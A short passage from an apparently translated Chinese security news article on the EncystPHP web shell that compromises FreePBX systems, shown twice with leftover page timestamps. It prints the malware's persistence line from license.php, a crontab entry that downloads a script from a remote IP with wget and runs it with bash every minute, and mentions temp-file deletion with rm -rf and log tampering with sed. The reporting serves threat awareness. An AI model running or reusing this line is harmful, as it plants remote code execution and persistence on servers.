rm -rf /tmp/*命令删除临时文件,并通过 sed 命令篡改系统日志。研究人员发现其持久化脚本为license.php,其中包含如下核心代码行:
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");
阅读量154059
发布时间 : 2026-02-04 11:26:44
本文是翻译文章,文章原作者 Ddos ,文章来源:securityonline
原文地址:https://securityonline.info/silent-intruder-encystphp-web-shell-burrows-into-freepbx-systems/
译文仅供参考,具体内容表达以及含义原文为准。
rm -rf /tmp/*命令删除临时文件,并通过 sed 命令篡改系统日志。研究人员发现其持久化脚本为license.php,其中包含如下核心代码行:
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");

安全客

2026-02-06 11:13:00
2026-02-06 11:12:32
2026-02-06 11:12:01
2026-02-06 11:11:35
2026-02-06 11:11:11
2026-02-06 11:13:00
2026-02-06 11:12:32
2026-02-06 11:12:01
2026-02-06 11:11:35
2026-02-06 11:11:11
2026-02-06 11:10:45
2026-02-06 11:10:18
发表评论
您还未登录,请先登录。
登录